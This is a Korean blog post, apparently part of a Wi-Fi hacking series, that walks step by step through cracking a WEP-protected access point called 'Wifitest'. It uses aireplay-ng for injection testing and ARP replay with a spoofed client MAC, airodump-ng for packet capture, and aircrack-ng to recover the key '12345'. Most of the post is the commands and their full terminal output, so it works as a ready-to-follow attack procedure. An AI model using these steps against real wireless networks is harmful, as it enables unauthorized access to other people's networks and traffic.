aireplay-ng로 무랜랜카드가 Injection이 가능한지 테스트 해본다
먼저 채널을 공격대상 무선 AP와 같은 채널로 변경한다.
Injection is working이란 말이 나오면 된다.
root@bt:~# iwconfig mon0 channel 6 root@bt:~# aireplay-ng -9 -e "Wifitest" -a 00:08:9F:64:DD:3C mon0 --ignore-negative-one 09:40:27 Waiting for beacon frame (BSSID: 00:08:9F:64:DD:3C) on channel 6 09:40:27 Trying broadcast probe requests... 09:40:27 Injection is working! 09:40:29 Found 1 AP 09:40:29 Trying directed probe requests... 09:40:29 00:08:9F:64:DD:3C - channel: 6 - 'Wifitest' 09:40:30 Ping (min/avg/max): 1.513ms/15.141ms/41.060ms Power: -124.97 09:40:30 30/30: 100%
공격대상 무선 AP와 같은 채널(6ch)로 스니핑을 한다.
root@bt:~# airodump-ng --bssid 00:08:9F:64:DD:3C mon0 -c 6 -w wep CH 6 ][ Elapsed: 52 s ][ 2016-01-07 09:40 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E 00:08:9F:64:DD:3C -127 85 508 177 4 6 54e WEP WEP OPN W BSSID STATION PWR Rate Lost Frames Probe 00:08:9F:64:DD:3C 00:26:66:07:17:74 0 0 - 1 40 150 00:08:9F:64:DD:3C DC:86:D8:24:02:0F -32 54e-24 4603 288
공격대상 무선 AP에 접속한 디바이스에 data 패킷을 유발하여 data를 모은다.
터미널 창을 하나 더 열고 aireplay-ng로 data 패킷을 보낸다
root@bt:~# aireplay-ng -3 -b 00:08:9F:64:DD:3C -h DC:86:D8:24:02:0F mon0 --ignore-negative-one The interface MAC (00:26:66:07:17:74) doesn't match the specified MAC (-h). ifconfig mon0 hw ether DC:86:D8:24:02:0F 10:04:36 Waiting for beacon frame (BSSID: 00:08:9F:64:DD:3C) on channel 6 Saving ARP requests in replay_arp-0107-100436.cap You should also start airodump-ng to capture replies. Read 2492 packets (got 23 ARP requests and 142 ACKs), sent 16 packets... (489 ppsRead 2809 packets (got 73 ARP requests and 226 ACKs), sent 66 packets... (496 ppsRead 3086 packets (got 121 ARP requests and 289 ACKs), sent 117 packets... (502 pRead 3362 packets (got 165 ARP requests and 356 ACKs), sent 167 packets... (501 pRead 3587 packets (got 208 ARP requests and 416 ACKs), sent 216 packets... (498 pRead 3775 packets (got 254 ARP requests and 471 ACKs), sent 266 packets... (498 pRead 3991 packets (got 295 ARP requests and 533 ACKs), sent 317 packets...
터미널 창을 하나 더 열고 .cab 파일에서 비밀번호를 추출한다.
IVs가 대략 3만개정도 모이면 크랙 가능하다.
root@bt:~# aircrack-ng wep-01.cap Aircrack-ng 1.1 r2178 [00:00:47] Tested 86447 keys (got 4805 IVs) KB depth byte(vote) 0 0/ 34 31(9728) 4D(9728) 94(9472) BB(9216) 9D(8960) 1 0/ 1 32(11008) 2A(8448) 33(8448) 42(8448) 2C(8192) 2 17/ 82 33(7936) 65(7936) 90(7936) BC(7680) FC(7680) 3 22/ 32 12(7680) 01(7424) 27(7424) 2D(7424) 44(7424) 4 0/ 1 35(11264) 72(9216) B2(8960) 57(8704) 04(8192) KEY FOUND! [ 31:32:33:34:35 ] (ASCII: 12345 ) Decrypted correctly: 100%
비밀번호는 12345 ^^
'Wifi' 카테고리의 다른 글
4) Wifi Wpa/Wpa2 비밀번호 크랙 가속화 (0) | 2016.03.06 |
---|---|
3) Wifi Wpa/wpa2 비밀번호 크랙 (0) | 2016.03.06 |
1) Wifi 패킷 스니핑 (0) | 2016.03.02 |